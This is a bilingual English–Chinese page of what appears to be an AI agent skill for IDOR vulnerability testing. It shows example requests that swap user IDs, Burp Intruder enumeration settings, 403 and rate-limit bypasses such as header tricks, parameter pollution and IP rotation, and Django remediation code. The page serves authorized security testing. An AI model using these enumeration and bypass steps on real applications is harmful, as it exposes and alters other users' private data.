Back to Details

idor-testing

Compare original and translation side by side

🇺🇸

Original

English
🇨🇳

Translation

Chinese

IDOR Vulnerability Testing

IDOR漏洞测试

Purpose

目的

Provide systematic methodologies for identifying and exploiting Insecure Direct Object Reference (IDOR) vulnerabilities in web applications. This skill covers both database object references and static file references, detection techniques using parameter manipulation and enumeration, exploitation via Burp Suite, and remediation strategies for securing applications against unauthorized access.
提供用于识别和利用Web应用程序中不安全直接对象引用(IDOR)漏洞的系统方法。此技能涵盖数据库对象引用和静态文件引用、使用参数操纵与枚举的检测技术、通过Burp Suite进行的利用操作,以及保护应用程序免受未授权访问的修复策略。

Inputs / Prerequisites

输入/前提条件

  • Target Web Application: URL of application with user-specific resources
  • Multiple User Accounts: At least two test accounts to verify cross-user access
  • Burp Suite or Proxy Tool: Intercepting proxy for request manipulation
  • Authorization: Written permission for security testing
  • Understanding of Application Flow: Knowledge of how objects are referenced (IDs, filenames)
  • 目标Web应用程序:包含用户特定资源的应用程序URL
  • 多个用户账户:至少两个测试账户,用于验证跨用户访问情况
  • Burp Suite或代理工具:用于请求操纵的拦截代理
  • 授权:安全测试的书面许可
  • 应用程序流程理解:了解对象的引用方式(ID、文件名)

Outputs / Deliverables

输出/交付成果

  • IDOR Vulnerability Report: Documentation of discovered access control bypasses
  • Proof of Concept: Evidence of unauthorized data access across user contexts
  • Affected Endpoints: List of vulnerable API endpoints and parameters
  • Impact Assessment: Classification of data exposure severity
  • Remediation Recommendations: Specific fixes for identified vulnerabilities
  • IDOR漏洞报告:已发现的访问控制绕过问题的文档记录
  • 概念验证:跨用户上下文未授权数据访问的证据
  • 受影响端点:存在漏洞的API端点和参数列表
  • 影响评估:数据泄露严重程度的分类
  • 修复建议:针对已识别漏洞的具体修复方案

Core Workflow

核心工作流程

1. Understand IDOR Vulnerability Types

1. 了解IDOR漏洞类型

Direct Reference to Database Objects

数据库对象的直接引用

Occurs when applications reference database records via user-controllable parameters:
undefined
当应用程序通过用户可控参数引用数据库记录时会出现此类情况:
undefined

Original URL (authenticated as User A)

Original URL (authenticated as User A)

example.com/user/profile?id=2023
example.com/user/profile?id=2023

Manipulation attempt (accessing User B's data)

Manipulation attempt (accessing User B's data)

example.com/user/profile?id=2022
undefined
example.com/user/profile?id=2022
undefined

Direct Reference to Static Files

静态文件的直接引用

Occurs when applications expose file paths or names that can be enumerated:
undefined
当应用程序暴露可被枚举的文件路径或名称时会出现此类情况:
undefined

Original URL (User A's receipt)

Original URL (User A's receipt)

example.com/static/receipt/205.pdf
example.com/static/receipt/205.pdf

Manipulation attempt (User B's receipt)

Manipulation attempt (User B's receipt)

example.com/static/receipt/200.pdf
undefined
example.com/static/receipt/200.pdf
undefined

2. Reconnaissance and Setup

2. 侦察与设置

Create Multiple Test Accounts

创建多个测试账户

Account 1: "attacker" - Primary testing account
Account 2: "victim" - Account whose data we attempt to access
Account 1: "attacker" - Primary testing account
Account 2: "victim" - Account whose data we attempt to access

Identify Object References

识别对象引用

Capture and analyze requests containing:
  • Numeric IDs in URLs: 
    /api/user/123
  • Numeric IDs in parameters: 
    ?id=123&action=view
  • Numeric IDs in request body: 
    {"userId": 123}
  • File paths: 
    /download/receipt_123.pdf
  • GUIDs/UUIDs: 
    /profile/a1b2c3d4-e5f6-...
捕获并分析包含以下内容的请求:
  • URL中的数字ID:
    /api/user/123
  • 参数中的数字ID:
    ?id=123&action=view
  • 请求体中的数字ID:
    {"userId": 123}
  • 文件路径:
    /download/receipt_123.pdf
  • GUID/UUID:
    /profile/a1b2c3d4-e5f6-...

Map User IDs

映射用户ID

undefined
undefined

Access user ID endpoint (if available)

Access user ID endpoint (if available)

GET /api/user-id/
GET /api/user-id/

Note ID patterns:

Note ID patterns:

- Sequential integers (1, 2, 3...)

- Sequential integers (1, 2, 3...)

- Auto-incremented values

- Auto-incremented values

- Predictable patterns

- Predictable patterns

undefined
undefined

3. Detection Techniques

3. 检测技术

URL Parameter Manipulation

URL参数操纵

undefined
undefined

Step 1: Capture original authenticated request

Step 1: Capture original authenticated request

GET /api/user/profile?id=1001 HTTP/1.1 Cookie: session=attacker_session
GET /api/user/profile?id=1001 HTTP/1.1 Cookie: session=attacker_session

Step 2: Modify ID to target another user

Step 2: Modify ID to target another user

GET /api/user/profile?id=1000 HTTP/1.1 Cookie: session=attacker_session
GET /api/user/profile?id=1000 HTTP/1.1 Cookie: session=attacker_session

Vulnerable if: Returns victim's data with attacker's session

Vulnerable if: Returns victim's data with attacker's session

undefined
undefined

Request Body Manipulation

请求体操纵

undefined
undefined

Original POST request

Original POST request

POST /api/address/update HTTP/1.1 Content-Type: application/json Cookie: session=attacker_session
{"id": 5, "userId": 1001, "address": "123 Attacker St"}
POST /api/address/update HTTP/1.1 Content-Type: application/json Cookie: session=attacker_session
{"id": 5, "userId": 1001, "address": "123 Attacker St"}

Modified request targeting victim

Modified request targeting victim

{"id": 5, "userId": 1000, "address": "123 Attacker St"}
undefined
{"id": 5, "userId": 1000, "address": "123 Attacker St"}
undefined

HTTP Method Switching

HTTP方法切换

undefined
undefined

Original GET request may be protected

Original GET request may be protected

GET /api/admin/users/1000 → 403 Forbidden
GET /api/admin/users/1000 → 403 Forbidden

Try alternative methods

Try alternative methods

POST /api/admin/users/1000 → 200 OK (Vulnerable!) PUT /api/admin/users/1000 → 200 OK (Vulnerable!)
undefined
POST /api/admin/users/1000 → 200 OK (Vulnerable!) PUT /api/admin/users/1000 → 200 OK (Vulnerable!)
undefined

4. Exploitation with Burp Suite

4. 使用Burp Suite进行利用

Manual Exploitation

手动利用

1. Configure browser proxy through Burp Suite
2. Login as "attacker" user
3. Navigate to profile/data page
4. Enable Intercept in Proxy tab
5. Capture request with user ID
6. Modify ID to victim's ID
7. Forward request
8. Observe response for victim's data
1. Configure browser proxy through Burp Suite
2. Login as "attacker" user
3. Navigate to profile/data page
4. Enable Intercept in Proxy tab
5. Capture request with user ID
6. Modify ID to victim's ID
7. Forward request
8. Observe response for victim's data

Automated Enumeration with Intruder

使用Intruder进行自动枚举

1. Send request to Intruder (Ctrl+I)
2. Clear all payload positions
3. Select ID parameter as payload position
4. Configure attack type: Sniper
5. Payload settings:
   - Type: Numbers
   - Range: 1 to 10000
   - Step: 1
6. Start attack
7. Analyze responses for 200 status codes
1. Send request to Intruder (Ctrl+I)
2. Clear all payload positions
3. Select ID parameter as payload position
4. Configure attack type: Sniper
5. Payload settings:
   - Type: Numbers
   - Range: 1 to 10000
   - Step: 1
6. Start attack
7. Analyze responses for 200 status codes

Battering Ram Attack for Multiple Positions

多位置的Battering Ram攻击

undefined
undefined

When same ID appears in multiple locations

When same ID appears in multiple locations

PUT /api/addresses/§5§/update HTTP/1.1
{"id": §5§, "userId": 3}
Attack Type: Battering Ram Payload: Numbers 1-1000
undefined
PUT /api/addresses/§5§/update HTTP/1.1
{"id": §5§, "userId": 3}
Attack Type: Battering Ram Payload: Numbers 1-1000
undefined

5. Common IDOR Locations

5. 常见IDOR位置

API Endpoints

API端点

/api/user/{id}
/api/profile/{id}
/api/order/{id}
/api/invoice/{id}
/api/document/{id}
/api/message/{id}
/api/address/{id}/update
/api/address/{id}/delete
/api/user/{id}
/api/profile/{id}
/api/order/{id}
/api/invoice/{id}
/api/document/{id}
/api/message/{id}
/api/address/{id}/update
/api/address/{id}/delete

File Downloads

文件下载

/download/invoice_{id}.pdf
/static/receipts/{id}.pdf
/uploads/documents/{filename}
/files/reports/report_{date}_{id}.xlsx
/download/invoice_{id}.pdf
/static/receipts/{id}.pdf
/uploads/documents/{filename}
/files/reports/report_{date}_{id}.xlsx

Query Parameters

查询参数

?userId=123
?orderId=456
?documentId=789
?file=report_123.pdf
?account=user@email.com
?userId=123
?orderId=456
?documentId=789
?file=report_123.pdf
?account=user@email.com

Quick Reference

快速参考

IDOR Testing Checklist

IDOR测试清单

TestMethodIndicator of Vulnerability
Increment/Decrement IDChange 
id=5
to 
id=4
Returns different user's data
Use Victim's IDReplace with known victim IDAccess granted to victim's resources
Enumerate RangeTest IDs 1-1000Find valid records of other users
Negative ValuesTest 
id=-1
or 
id=0
Unexpected data or errors
Large ValuesTest 
id=99999999
System information disclosure
String IDsChange format 
id=user_123
Logic bypass
GUID ManipulationModify UUID portionsPredictable UUID patterns
测试项方法漏洞指示
递增/递减ID
id=5
改为
id=4
返回其他用户的数据
使用受害者ID替换为已知的受害者ID被授予访问受害者资源的权限
枚举范围测试ID 1-1000找到其他用户的有效记录
负值测试
id=-1
id=0
出现意外数据或错误
大数值测试
id=99999999
系统信息泄露
字符串ID更改格式
id=user_123
逻辑绕过
GUID操纵修改UUID部分可预测的UUID模式

Response Analysis

响应分析

Status CodeInterpretation
200 OKPotential IDOR - verify data ownership
403 ForbiddenAccess control working
404 Not FoundResource doesn't exist
401 UnauthorizedAuthentication required
500 ErrorPotential input validation issue
状态码解释
200 OK潜在IDOR漏洞 - 验证数据所有权
403 Forbidden访问控制正常工作
404 Not Found资源不存在
401 Unauthorized需要身份验证
500 Error潜在的输入验证问题

Common Vulnerable Parameters

常见易受攻击的参数

Parameter TypeExamples
User identifiers
userId
, 
uid
, 
user_id
, 
account
Resource identifiers
id
, 
pid
, 
docId
, 
fileId
Order/Transaction
orderId
, 
transactionId
, 
invoiceId
Message/Communication
messageId
, 
threadId
, 
chatId
File references
filename
, 
file
, 
document
, 
path
参数类型示例
用户标识符
userId
, 
uid
, 
user_id
, 
account
资源标识符
id
, 
pid
, 
docId
, 
fileId
订单/交易
orderId
, 
transactionId
, 
invoiceId
消息/通信
messageId
, 
threadId
, 
chatId
文件引用
filename
, 
file
, 
document
, 
path

Constraints and Limitations

约束与限制

Operational Boundaries

操作边界

  • Requires at least two valid user accounts for verification
  • Some applications use session-bound tokens instead of IDs
  • GUID/UUID references harder to enumerate but not impossible
  • Rate limiting may restrict enumeration attempts
  • Some IDOR requires chained vulnerabilities to exploit
  • 需要至少两个有效用户账户进行验证
  • 部分应用程序使用会话绑定令牌而非ID
  • GUID/UUID引用更难枚举,但并非不可能
  • 速率限制可能会限制枚举尝试
  • 某些IDOR漏洞需要结合其他漏洞才能利用

Detection Challenges

检测挑战

  • Horizontal privilege escalation (user-to-user) vs vertical (user-to-admin)
  • Blind IDOR where response doesn't confirm access
  • Time-based IDOR in asynchronous operations
  • IDOR in websocket communications
  • 横向权限提升(用户到用户)与纵向权限提升(用户到管理员)的区别
  • 盲IDOR:响应无法确认访问情况
  • 异步操作中的基于时间的IDOR
  • WebSocket通信中的IDOR

Legal Requirements

法律要求

  • Only test applications with explicit authorization
  • Document all testing activities and findings
  • Do not access, modify, or exfiltrate real user data
  • Report findings through proper disclosure channels
  • 仅对获得明确授权的应用程序进行测试
  • 记录所有测试活动和发现
  • 不得访问、修改或泄露真实用户数据
  • 通过适当的披露渠道报告发现的问题

Examples

示例

Example 1: Basic ID Parameter IDOR

示例1:基础ID参数IDOR

undefined
undefined

Login as attacker (userId=1001)

Login as attacker (userId=1001)

Navigate to profile page

Navigate to profile page

Original request

Original request

GET /api/profile?id=1001 HTTP/1.1 Cookie: session=abc123
GET /api/profile?id=1001 HTTP/1.1 Cookie: session=abc123

Response: Attacker's profile data

Response: Attacker's profile data

Modified request (targeting victim userId=1000)

Modified request (targeting victim userId=1000)

GET /api/profile?id=1000 HTTP/1.1 Cookie: session=abc123
GET /api/profile?id=1000 HTTP/1.1 Cookie: session=abc123

Vulnerable Response: Victim's profile data returned!

Vulnerable Response: Victim's profile data returned!

undefined
undefined

Example 2: IDOR in Address Update Endpoint

示例2:地址更新端点中的IDOR

undefined
undefined

Intercept address update request

Intercept address update request

PUT /api/addresses/5/update HTTP/1.1 Content-Type: application/json Cookie: session=attacker_session
{ "id": 5, "userId": 1001, "street": "123 Main St", "city": "Test City" }
PUT /api/addresses/5/update HTTP/1.1 Content-Type: application/json Cookie: session=attacker_session
{ "id": 5, "userId": 1001, "street": "123 Main St", "city": "Test City" }

Modify userId to victim's ID

Modify userId to victim's ID

{ "id": 5, "userId": 1000, # Changed from 1001 "street": "Hacked Address", "city": "Exploit City" }
{ "id": 5, "userId": 1000, # Changed from 1001 "street": "Hacked Address", "city": "Exploit City" }

If 200 OK: Address created under victim's account

If 200 OK: Address created under victim's account

undefined
undefined

Example 3: Static File IDOR

示例3:静态文件IDOR

undefined
undefined

Download own receipt

Download own receipt

GET /api/download/5 HTTP/1.1 Cookie: session=attacker_session
GET /api/download/5 HTTP/1.1 Cookie: session=attacker_session

Response: PDF of attacker's receipt (order #5)

Response: PDF of attacker's receipt (order #5)

Attempt to access other receipts

Attempt to access other receipts

GET /api/download/3 HTTP/1.1 Cookie: session=attacker_session
GET /api/download/3 HTTP/1.1 Cookie: session=attacker_session

Vulnerable Response: PDF of victim's receipt (order #3)!

Vulnerable Response: PDF of victim's receipt (order #3)!

undefined
undefined

Example 4: Burp Intruder Enumeration

示例4:Burp Intruder枚举

undefined
undefined

Configure Intruder attack

Configure Intruder attack

Target: PUT /api/addresses/§1§/update Payload Position: Address ID in URL and body
Attack Configuration:
  • Type: Battering Ram
  • Payload: Numbers 0-20, Step 1
Body Template: { "id": §1§, "userId": 3 }
Target: PUT /api/addresses/§1§/update Payload Position: Address ID in URL and body
Attack Configuration:
  • Type: Battering Ram
  • Payload: Numbers 0-20, Step 1
Body Template: { "id": §1§, "userId": 3 }

Analyze results:

Analyze results:

- 200 responses indicate successful modification

- 200 responses indicate successful modification

- Check victim's account for new addresses

- Check victim's account for new addresses

undefined
undefined

Example 5: Horizontal to Vertical Escalation

示例5:横向到纵向权限提升

undefined
undefined

Step 1: Enumerate user roles

Step 1: Enumerate user roles

GET /api/user/1 → {"role": "user", "id": 1} GET /api/user/2 → {"role": "user", "id": 2} GET /api/user/3 → {"role": "admin", "id": 3}
GET /api/user/1 → {"role": "user", "id": 1} GET /api/user/2 → {"role": "user", "id": 2} GET /api/user/3 → {"role": "admin", "id": 3}

Step 2: Access admin functions with discovered ID

Step 2: Access admin functions with discovered ID

GET /api/admin/dashboard?userId=3 HTTP/1.1 Cookie: session=regular_user_session
GET /api/admin/dashboard?userId=3 HTTP/1.1 Cookie: session=regular_user_session

If accessible: Vertical privilege escalation achieved

If accessible: Vertical privilege escalation achieved

undefined
undefined

Troubleshooting

故障排除

Issue: All Requests Return 403 Forbidden

问题:所有请求均返回403 Forbidden

Cause: Server-side access control is implemented Solution:
undefined
原因:服务器端已实现访问控制 解决方案
undefined

Try alternative attack vectors:

Try alternative attack vectors:

  1. HTTP method switching (GET → POST → PUT)
  2. Add X-Original-URL or X-Rewrite-URL headers
  3. Try parameter pollution: ?id=1001&id=1000
  4. URL encoding variations: %31%30%30%30 for "1000"
  5. Case variations for string IDs
undefined
  1. HTTP method switching (GET → POST → PUT)
  2. Add X-Original-URL or X-Rewrite-URL headers
  3. Try parameter pollution: ?id=1001&id=1000
  4. URL encoding variations: %31%30%30%30 for "1000"
  5. Case variations for string IDs
undefined

Issue: Application Uses UUIDs Instead of Sequential IDs

问题:应用程序使用UUID而非连续ID

Cause: Randomized identifiers reduce enumeration risk Solution:
undefined
原因:随机标识符降低了枚举风险 解决方案
undefined

UUID discovery techniques:

UUID discovery techniques:

  1. Check response bodies for leaked UUIDs
  2. Search JavaScript files for hardcoded UUIDs
  3. Check API responses that list multiple objects
  4. Look for UUID patterns in error messages
  5. Try UUID v1 (time-based) prediction if applicable
undefined
  1. Check response bodies for leaked UUIDs
  2. Search JavaScript files for hardcoded UUIDs
  3. Check API responses that list multiple objects
  4. Look for UUID patterns in error messages
  5. Try UUID v1 (time-based) prediction if applicable
undefined

Issue: Session Token Bound to User

问题:会话令牌与用户绑定

Cause: Application validates session against requested resource Solution:
undefined
原因:应用程序会验证会话与请求资源是否匹配 解决方案
undefined

Advanced bypass attempts:

Advanced bypass attempts:

  1. Test for IDOR in unauthenticated endpoints
  2. Check password reset/email verification flows
  3. Look for IDOR in file upload/download
  4. Test API versioning: /api/v1/ vs /api/v2/
  5. Check mobile API endpoints (often less protected)
undefined
  1. Test for IDOR in unauthenticated endpoints
  2. Check password reset/email verification flows
  3. Look for IDOR in file upload/download
  4. Test API versioning: /api/v1/ vs /api/v2/
  5. Check mobile API endpoints (often less protected)
undefined

Issue: Rate Limiting Blocks Enumeration

问题:速率限制阻止枚举

Cause: Application implements request throttling Solution:
undefined
原因:应用程序实现了请求限流 解决方案
undefined

Bypass techniques:

Bypass techniques:

  1. Add delays between requests (Burp Intruder throttle)
  2. Rotate IP addresses (proxy chains)
  3. Target specific high-value IDs instead of full range
  4. Use different endpoints for same resources
  5. Test during off-peak hours
undefined
  1. Add delays between requests (Burp Intruder throttle)
  2. Rotate IP addresses (proxy chains)
  3. Target specific high-value IDs instead of full range
  4. Use different endpoints for same resources
  5. Test during off-peak hours
undefined

Issue: Cannot Verify IDOR Impact

问题:无法验证IDOR影响

Cause: Response doesn't clearly indicate data ownership Solution:
undefined
原因:响应未明确指示数据所有权 解决方案
undefined

Verification methods:

Verification methods:

  1. Create unique identifiable data in victim account
  2. Look for PII markers (name, email) in responses
  3. Compare response lengths between users
  4. Check for timing differences in responses
  5. Use secondary indicators (creation dates, metadata)
undefined
  1. Create unique identifiable data in victim account
  2. Look for PII markers (name, email) in responses
  3. Compare response lengths between users
  4. Check for timing differences in responses
  5. Use secondary indicators (creation dates, metadata)
undefined

Remediation Guidance

修复指南

Implement Proper Access Control

实施适当的访问控制

python
undefined
python
undefined

Django example - validate ownership

Django example - validate ownership

def update_address(request, address_id): address = Address.objects.get(id=address_id)
# Verify ownership before allowing update
if address.user != request.user:
    return HttpResponseForbidden("Unauthorized")

# Proceed with update
address.update(request.data)
undefined
def update_address(request, address_id): address = Address.objects.get(id=address_id)
# Verify ownership before allowing update
if address.user != request.user:
    return HttpResponseForbidden("Unauthorized")

# Proceed with update
address.update(request.data)
undefined

Use Indirect References

使用间接引用

python
undefined
python
undefined

Instead of: /api/address/123

Instead of: /api/address/123

Use: /api/address/current-user/billing

Use: /api/address/current-user/billing

def get_address(request): # Always filter by authenticated user address = Address.objects.filter(user=request.user).first() return address
undefined
def get_address(request): # Always filter by authenticated user address = Address.objects.filter(user=request.user).first() return address
undefined

Server-Side Validation

服务器端验证

python
undefined
python
undefined

Always validate on server, never trust client input

Always validate on server, never trust client input

def download_receipt(request, receipt_id): receipt = Receipt.objects.filter( id=receipt_id, user=request.user # Critical: filter by current user ).first()
if not receipt:
    return HttpResponseNotFound()

return FileResponse(receipt.file)
undefined
def download_receipt(request, receipt_id): receipt = Receipt.objects.filter( id=receipt_id, user=request.user # Critical: filter by current user ).first()
if not receipt:
    return HttpResponseNotFound()

return FileResponse(receipt.file)
undefined

When to Use

使用场景

This skill is applicable to execute the workflow or actions described in the overview.
当需要执行概述中描述的工作流程或操作时,适用此技能。